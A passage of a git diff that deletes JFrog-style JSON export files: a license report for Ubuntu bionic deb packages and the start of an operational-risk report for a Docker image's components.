] - }, - { - "component_id": "ubuntu:bionic:libp11-kit0:0.23.9-2ubuntu0.1", - "component_name": "ubuntu:bionic:libp11-kit0", - "version": "0.23.9-2ubuntu0.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libp11-kit0", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "ISC", - "link": "http://www.opensource.org/licenses/ISC", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libpam-modules:1.1.8-3.6ubuntu2.18.04.6", - "component_name": "ubuntu:bionic:libpam-modules", - "version": "1.1.8-3.6ubuntu2.18.04.6", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libpam-modules", - "licenses": [ - { - "key": "GPL-3.0-only", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libpam-modules-bin:1.1.8-3.6ubuntu2.18.04.6", - "component_name": "ubuntu:bionic:libpam-modules-bin", - "version": "1.1.8-3.6ubuntu2.18.04.6", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libpam-modules-bin", - "licenses": [ - { - "key": "GPL-3.0-only", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libpam-runtime:1.1.8-3.6ubuntu2.18.04.6", - "component_name": "ubuntu:bionic:libpam-runtime", - "version": "1.1.8-3.6ubuntu2.18.04.6", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libpam-runtime", - "licenses": [ - { - "key": "GPL-3.0-only", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libpam0g:1.1.8-3.6ubuntu2.18.04.6", - "component_name": "ubuntu:bionic:libpam0g", - "version": "1.1.8-3.6ubuntu2.18.04.6", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libpam0g", - "licenses": [ - { - "key": "GPL-3.0-only", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libpcre3:2:8.39-9ubuntu0.1", - "component_name": "ubuntu:bionic:libpcre3", - "version": "2:8.39-9ubuntu0.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libpcre3", - "licenses": [ - { - "key": "BSD-3-Clause-Clear", - "link": "http://labs.metacarta.com/license-explanation.html#license", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libprocps6:2:3.3.12-3ubuntu1.2", - "component_name": "ubuntu:bionic:libprocps6", - "version": "2:3.3.12-3ubuntu1.2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libprocps6", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libseccomp2:2.5.1-1ubuntu1~18.04.2", - "component_name": "ubuntu:bionic:libseccomp2", - "version": "2.5.1-1ubuntu1~18.04.2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libseccomp2", - "licenses": [ - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libselinux1:2.7-2build2", - "component_name": "ubuntu:bionic:libselinux1", - "version": "2.7-2build2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libselinux1", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libsemanage-common:2.7-2build2", - "component_name": "ubuntu:bionic:libsemanage-common", - "version": "2.7-2build2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libsemanage-common", - "licenses": [ - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libsemanage1:2.7-2build2", - "component_name": "ubuntu:bionic:libsemanage1", - "version": "2.7-2build2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libsemanage1", - "licenses": [ - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libsepol1:2.7-1ubuntu0.1", - "component_name": "ubuntu:bionic:libsepol1", - "version": "2.7-1ubuntu0.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libsepol1", - "licenses": [ - { - "key": "LGPL-2.1-only", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libsmartcols1:2.31.1-0.4ubuntu3.7", - "component_name": "ubuntu:bionic:libsmartcols1", - "version": "2.31.1-0.4ubuntu3.7", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libsmartcols1", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libss2:1.44.1-1ubuntu1.4", - "component_name": "ubuntu:bionic:libss2", - "version": "1.44.1-1ubuntu1.4", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libss2", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libssl1.1:1.1.1-1ubuntu2.1~18.04.23", - "component_name": "ubuntu:bionic:libssl1.1", - "version": "1.1.1-1ubuntu2.1~18.04.23", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libssl1.1", - "licenses": [ - { - "key": "OpenSSL", - "link": "http://www.openssl.org/source/license.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libstdc++6:8.4.0-1ubuntu1~18.04", - "component_name": "ubuntu:bionic:libstdc++6", - "version": "8.4.0-1ubuntu1~18.04", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libstdc++6", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "ZLIB", - "link": "http://www.opensource.org/licenses/Zlib", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libsystemd0:237-3ubuntu10.57", - "component_name": "ubuntu:bionic:libsystemd0", - "version": "237-3ubuntu10.57", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libsystemd0", - "licenses": [ - { - "key": "CC0-1.0", - "link": "http://creativecommons.org/publicdomain/zero/1.0/", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-only", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libtasn1-6:4.13-2", - "component_name": "ubuntu:bionic:libtasn1-6", - "version": "4.13-2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libtasn1-6", - "licenses": [ - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libtinfo5:6.1-1ubuntu1.18.04.1", - "component_name": "ubuntu:bionic:libtinfo5", - "version": "6.1-1ubuntu1.18.04.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libtinfo5", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "X11", - "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libudev1:237-3ubuntu10.57", - "component_name": "ubuntu:bionic:libudev1", - "version": "237-3ubuntu10.57", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libudev1", - "licenses": [ - { - "key": "CC0-1.0", - "link": "http://creativecommons.org/publicdomain/zero/1.0/", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-only", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libunistring2:0.9.9-0ubuntu2", - "component_name": "ubuntu:bionic:libunistring2", - "version": "0.9.9-0ubuntu2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libunistring2", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libuuid1:2.31.1-0.4ubuntu3.7", - "component_name": "ubuntu:bionic:libuuid1", - "version": "2.31.1-0.4ubuntu3.7", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libuuid1", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:libyaml-0-2:0.1.7-2ubuntu3", - "component_name": "ubuntu:bionic:libyaml-0-2", - "version": "0.1.7-2ubuntu3", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libyaml-0-2", - "licenses": [ - { - "key": "Unknown", - "link": "", - "sources": [] - } - ] - }, - { - "component_id": "ubuntu:bionic:libzstd1:1.3.3+dfsg-2ubuntu1.2", - "component_name": "ubuntu:bionic:libzstd1", - "version": "1.3.3+dfsg-2ubuntu1.2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:libzstd1", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "ZLIB", - "link": "http://www.opensource.org/licenses/Zlib", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:locales:2.27-3ubuntu1.6", - "component_name": "ubuntu:bionic:locales", - "version": "2.27-3ubuntu1.6", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:locales", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-4-Clause-UC", - "link": "http://www.freebsd.org/copyright/license.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "IETF", - "link": "", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "Intel", - "link": "http://opensource.org/licenses/Intel", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "ISC", - "link": "http://www.opensource.org/licenses/ISC", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT-CMU", - "link": "https://fedoraproject.org/wiki/Licensing:MIT?rd=Licensing/MIT#CMU_Style", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "Spencer-94", - "link": "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:login:1:4.5-1ubuntu2.5", - "component_name": "ubuntu:bionic:login", - "version": "1:4.5-1ubuntu2.5", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:login", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "TCP-wrappers", - "link": "http://rc.quest.com/topics/openssh/license.php#tcpwrappers", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:lsb-base:9.20170808ubuntu1", - "component_name": "ubuntu:bionic:lsb-base", - "version": "9.20170808ubuntu1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:lsb-base", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:mawk:1.3.3-17ubuntu3", - "component_name": "ubuntu:bionic:mawk", - "version": "1.3.3-17ubuntu3", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:mawk", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:mount:2.31.1-0.4ubuntu3.7", - "component_name": "ubuntu:bionic:mount", - "version": "2.31.1-0.4ubuntu3.7", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:mount", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:ncurses-base:6.1-1ubuntu1.18.04.1", - "component_name": "ubuntu:bionic:ncurses-base", - "version": "6.1-1ubuntu1.18.04.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:ncurses-base", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "X11", - "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:ncurses-bin:6.1-1ubuntu1.18.04.1", - "component_name": "ubuntu:bionic:ncurses-bin", - "version": "6.1-1ubuntu1.18.04.1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:ncurses-bin", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "X11", - "link": "http://www.xfree86.org/3.3.6/COPYRIGHT2.html#3", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:netbase:5.4", - "component_name": "ubuntu:bionic:netbase", - "version": "5.4", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:netbase", - "licenses": [ - { - "key": "GPL-2", - "link": "", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:openssl:1.1.1-1ubuntu2.1~18.04.23", - "component_name": "ubuntu:bionic:openssl", - "version": "1.1.1-1ubuntu2.1~18.04.23", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:openssl", - "licenses": [ - { - "key": "OpenSSL", - "link": "http://www.openssl.org/source/license.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:passwd:1:4.5-1ubuntu2.5", - "component_name": "ubuntu:bionic:passwd", - "version": "1:4.5-1ubuntu2.5", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:passwd", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "TCP-wrappers", - "link": "http://rc.quest.com/topics/openssh/license.php#tcpwrappers", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:perl-base:5.26.1-6ubuntu0.7", - "component_name": "ubuntu:bionic:perl-base", - "version": "5.26.1-6ubuntu0.7", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:perl-base", - "licenses": [ - { - "key": "Artistic-2.0", - "link": "http://www.opensource.org/licenses/artistic-license-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "CC0-1.0", - "link": "http://creativecommons.org/publicdomain/zero/1.0/", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-or-later", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0-or-later", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "Zlib", - "link": "http://www.opensource.org/licenses/Zlib", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:procps:2:3.3.12-3ubuntu1.2", - "component_name": "ubuntu:bionic:procps", - "version": "2:3.3.12-3ubuntu1.2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:procps", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:sed:4.4-2", - "component_name": "ubuntu:bionic:sed", - "version": "4.4-2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:sed", - "licenses": [ - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:sensible-utils:0.0.12", - "component_name": "ubuntu:bionic:sensible-utils", - "version": "0.0.12", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:sensible-utils", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:sysvinit-utils:2.88dsf-59.10ubuntu1", - "component_name": "ubuntu:bionic:sysvinit-utils", - "version": "2.88dsf-59.10ubuntu1", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:sysvinit-utils", - "licenses": [ - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:tar:1.29b-2ubuntu0.4", - "component_name": "ubuntu:bionic:tar", - "version": "1.29b-2ubuntu0.4", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:tar", - "licenses": [ - { - "key": "GPL-2.0-only", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0-only", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:tzdata:2023c-0ubuntu0.18.04", - "component_name": "ubuntu:bionic:tzdata", - "version": "2023c-0ubuntu0.18.04", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:tzdata", - "licenses": [ - { - "key": "Unknown", - "link": "", - "sources": [] - } - ] - }, - { - "component_id": "ubuntu:bionic:ubuntu-keyring:2018.09.18.1~18.04.2", - "component_name": "ubuntu:bionic:ubuntu-keyring", - "version": "2018.09.18.1~18.04.2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:ubuntu-keyring", - "licenses": [ - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:util-linux:2.31.1-0.4ubuntu3.7", - "component_name": "ubuntu:bionic:util-linux", - "version": "2.31.1-0.4ubuntu3.7", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:util-linux", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD 2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-3.0", - "link": "http://www.gnu.org/licenses/gpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-3.0", - "link": "http://www.gnu.org/licenses/lgpl-3.0-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ubuntu:bionic:zlib1g:1:1.2.11.dfsg-0ubuntu2.2", - "component_name": "ubuntu:bionic:zlib1g", - "version": "1:1.2.11.dfsg-0ubuntu2.2", - "pkg_type": "deb", - "package_id": "deb://ubuntu:bionic:zlib1g", - "licenses": [ - { - "key": "Unknown", - "link": "", - "sources": [] - } - ] - } -] diff --git a/Docker_07f669c_Operational_risk_Export.json b/Docker_07f669c_Operational_risk_Export.json deleted file mode 100755 index ef2b1a787..000000000 --- a/Docker_07f669c_Operational_risk_Export.json +++ /dev/null @@ -1,722 +0,0 @@ -[ - { - "component": "jakarta.transaction:jakarta.transaction-api", - "version_in_use": "2.0.1", - "risk": "Low", - "risk_reason": "Version Age", - "is_eol": null, - "released": "0001-01-01T00:00:00Z", - "latest_version": "2.0.1", - "cadence": 0, - "committers": null, - "commits": null - }, - { - "component": 